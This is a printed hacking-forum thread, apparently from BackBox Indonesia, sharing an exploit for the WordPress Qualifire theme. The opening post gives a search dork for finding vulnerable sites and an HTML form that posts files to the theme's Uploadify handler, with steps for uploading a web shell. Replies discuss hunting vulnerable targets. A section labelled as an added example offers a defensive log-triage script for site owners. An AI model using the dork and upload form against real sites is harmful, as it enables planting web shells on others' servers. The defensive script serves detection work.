BackBox Indonesia
Exploit WordPress Qualifire Themes - Printable Version




Exploit WordPress Qualifire Themes - Nue Bhandell - 03-22-2016

Evening, gang. *Always hunting for bugs, when are you going to hunt for a girlfriend? :D :D :D
Just sharing an old exploit for fun, maybe it still works, lol.

Those who are already masters, step aside for now, babe


Play with Me, Baby

Dork :
inurl:"/wp-content/themes/qualifire"

Vulnerable? Usually you get a blank white page or some garbled numbers/letters, but if it's 404 Not Found, just let it go, hehehe

Copy the CSRF upload script:
<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Then just upload your file/shell.
If it succeeds, the number 1 appears.

Shell/file access: http://www.target.co.li/filemumas

Hope this is useful, gang; sorry if the post is lame.
Time for Nue and the Katakan Putus team to head out, gang, because final exams (UAS) are tomorrow, lol.

Bye



SOURCE
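For site owners, a log triage for the upload handler named in the post above, as an added example that is not part of the original post: it flags POSTs to the theme's `uploadify.php`, marks those answered with a 1-byte body (the "1" the post describes) as likely successful, and lists what the same client requested afterwards. The combined log layout, the assumption that the size field records response body bytes, and all sample lines are assumptions of this example.

```python
import re
from collections import defaultdict

# Endpoint named in the post above (the theme's bundled Uploadify handler).
UPLOAD_PATH = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"

# Apache/nginx "combined" access log format (assumed layout).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def triage(lines):
    """Return {ip: {"uploads": [...], "followups": [...]}} for clients that
    POSTed to the Uploadify handler. An upload is "likely_success" when the
    server answered 200 with a 1-byte body; anything else is an "attempt"."""
    report = defaultdict(lambda: {"uploads": [], "followups": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path = m["ip"], m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path.lower().endswith(UPLOAD_PATH):
            ok = m["status"] == "200" and m["size"] == "1"
            report[ip]["uploads"].append((m["ts"], "likely_success" if ok else "attempt"))
        elif ip in report:
            # Later requests from the same client may be the uploaded file being fetched.
            report[ip]["followups"].append((m["ts"], m["method"], path, m["status"]))
    return dict(report)

# Constructed sample log lines (documentation IP ranges, placeholder file name).
SAMPLE = [
    '198.51.100.7 - - [22/Mar/2016:12:40:01 +0700] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Mar/2016:12:41:10 +0700] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Mar/2016:12:41:30 +0700] "GET /uploaded-file-placeholder.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Mar/2016:12:42:00 +0700] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [22/Mar/2016:12:43:00 +0700] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 404 162 "-" "curl/7.47"',
]

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE).items():
        print(ip, hits)
```

Feed it real logs with `triage(open(path))`; the follow-up list gives the paths to check on disk for files that do not belong to the site.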


RE: Exploit WordPress Qualifire Themes - ./EL-Mueeza_23 - 03-22-2016

Are there still vulnerable ones, bro? >_<


RE: Exploit WordPress Qualifire Themes - Nue Bhandell - 03-22-2016

(03-22-2016, 12:50 PM)./EL-Mueeza_23 Wrote: Are there still vulnerable ones, bro? >_<

Vulnerable, but not virgin, bro :D


RE: Exploit WordPress Qualifire Themes - ikkeeeh - 05-28-2016

What do you usually use to scan for vulns, bro?


RE: Exploit WordPress Qualifire Themes - pu12 - 06-01-2016

Vulnerable but Invalid.. :D


RE: Exploit WordPress Qualifire Themes - ljpoy7 - 06-01-2016

Just found a VULN one, but when I called the shell it didn't show up :v got a notice error